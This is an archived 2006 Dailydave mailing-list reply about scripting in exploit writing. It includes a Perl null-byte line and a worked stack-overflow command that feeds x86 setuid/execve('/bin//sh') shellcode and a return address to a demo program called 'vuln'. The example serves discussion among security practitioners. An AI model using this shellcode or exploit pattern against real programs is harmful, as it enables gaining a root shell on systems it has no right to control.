|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Dailydave] Google Security Team
From: Ferguson, Justin (IARC) (FergusonJ
nv.doe.gov)
Date: Thu Sep 28 2006 - 12:25:55 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> Thats so cool! I think this is a shining beacon!
>
> Forget abstraction, forget frameworks (sorry HD), forget C++,C ....
> Perl.
Well technically speaking it's all assembly eventually ;], just because you
didn't write the C code that your script calls, doesn't make it really
special (imho of course)
> Well... This is not 100% true. Tavis used also Perl! ;-) Note the
following source line:
>
> perl -e 'print "\x00"x"262144"' >&3
I guess I don't understand the big deal with this, this was the first thing
I realized when writing my first exploit??
$ ./vuln `echo -e
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x6
2\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"``echo
"AAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAA"``echo -e "\xfa\xff\xff\xbf"`
(not all versions of echo accept the -e, nor do all of them require it)
_______________________________________________
Dailydave mailing list
Dailydavelists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]